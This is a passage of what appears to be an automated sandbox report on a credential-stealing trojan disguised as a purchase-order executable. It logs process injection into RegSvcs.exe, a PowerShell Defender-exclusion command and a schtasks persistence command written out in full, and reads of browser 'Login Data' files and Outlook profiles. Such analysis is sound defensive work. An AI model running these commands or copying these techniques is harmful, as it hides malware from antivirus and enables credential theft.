                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtOpenKeyEx: Indirect: 0x140077B9BJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQueryValueKey: Indirect: 0x140077C9FJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtClose: Indirect: 0x140077E81
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 8D8008Jump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 758008
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0043B106 LogonUserW,0_2_0043B106
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00403D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403D19
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0044411C SendInput,keybd_event,0_2_0044411C
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_004474E7 mouse_event,0_2_004474E7
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\server01.exe "C:\Users\user\AppData\Local\Temp\server01.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:00 /du 23:59 /sc daily /ri 1 /f
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0043A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0043A66C
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_004471FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_004471FA
                        Source: PO #09465610_GQ 003745_SO-242000846.exeBinary or memory string: Shell_TrayWnd
                        Source: PO #09465610_GQ 003745_SO-242000846.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_004265C4 cpuid 0_2_004265C4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,13_2_00417A20
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\alg.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server01.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0045091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0045091D
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0047B340 GetUserNameW,0_2_0047B340
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00431E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00431E8E
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0041DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0041DDC0
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d24dc0.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d54e10.14.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d54e10.14.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.0.server01.exe.e40000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d3cdf0.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d24dc0.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3252, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: server01.exe PID: 4324, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.2751e9e.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.2751e9e.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3c95570.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.2a50000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.2752d86.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3c96458.13.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.2b90000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.2a50ee8.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3c96458.13.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3ccfd90.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.2b90000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3ccfd90.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.2a50000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.2a50ee8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.2752d86.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3c95570.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000D.00000002.2136041654.0000000002711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2137004258.0000000002A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2139311354.0000000003C95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2137350892.0000000002B90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d24dc0.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d54e10.14.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d54e10.14.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.0.server01.exe.e40000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d3cdf0.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d24dc0.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3252, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: server01.exe PID: 4324, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: PO #09465610_GQ 003745_SO-242000846.exeBinary or memory string: WIN_81
                        Source: PO #09465610_GQ 003745_SO-242000846.exeBinary or memory string: WIN_XP
                        Source: PO #09465610_GQ 003745_SO-242000846.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                        Source: PO #09465610_GQ 003745_SO-242000846.exeBinary or memory string: WIN_XPe
                        Source: PO #09465610_GQ 003745_SO-242000846.exeBinary or memory string: WIN_VISTA
                        Source: PO #09465610_GQ 003745_SO-242000846.exeBinary or memory string: WIN_7
                        Source: PO #09465610_GQ 003745_SO-242000846.exeBinary or memory string: WIN_8
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d24dc0.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d54e10.14.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d54e10.14.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.0.server01.exe.e40000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d3cdf0.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d24dc0.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3330930022.0000000003263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3252, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: server01.exe PID: 4324, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d24dc0.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d54e10.14.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d54e10.14.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.0.server01.exe.e40000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d3cdf0.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3d24dc0.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3252, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: server01.exe PID: 4324, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.2751e9e.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.2751e9e.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3c95570.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.2a50000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.2752d86.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3c96458.13.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.2b90000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.2a50ee8.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3c96458.13.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3ccfd90.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.2b90000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.3ccfd90.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.RegSvcs.exe.2a50000.4.unpack, type: UNPACKEDPE
